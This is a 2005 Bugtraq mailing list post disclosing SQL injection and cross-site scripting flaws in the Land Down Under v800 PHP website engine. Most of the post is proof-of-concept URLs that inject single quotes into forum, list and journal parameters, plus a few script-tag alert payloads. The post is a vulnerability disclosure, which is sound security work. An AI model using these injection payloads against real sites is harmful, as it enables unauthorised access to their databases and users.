Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Bugs Land Down Under v800
From: bl2k () shabgard org
Date: 20 Aug 2005 09:43:01 -0000
Bugs Land Down Under v800
PHP/MySQL Website engine
Copyright Neocrome - http://www.neocrome.net
---------------------------------------------
Sql Injection and Cross Site Scripting Problem

examlple :

/ldu/forums.php?m=topics&s=' 
/ldu/list.php?c=articles&s=title&w=asc&o='&p=1
/ldu/list.php?c=articles&s=title&w='&o=1&p=1 
/ldu/list.php?c=articles&s='&w=asc&o=1&p=1
/ldu/journal.php?m='&s=username&w=asc 
/ldu/journal.php?m='&p=1
/ldu/journal.php?m=' 
/ldu/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x=' 
/ldu/forums.php?m=topics&q=3&n=' 
/ldu/list.php?c=articles&s=title&w=asc&o=1&p=' 
/ldu/forums.php?m='&q=3&n=last 
/ldu/links.php?c=links&s=title&w=' 
---------------------------------------------
/ldu/index.php?c='><script>alert('test');</script> 
/ldu/index.php?m='><script>alert('test');</script>
/ldu/journal.php?m=home&s=username&w='><script>alert('test');</script>


bl2k & SmallMouse  
Greetz --elite-- , hurgy , Littlehackers , Cisco
www.shabgard.org

  By Date           By Thread  

Current thread:
  • Bugs Land Down Under v800 bl2k (Aug 20)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]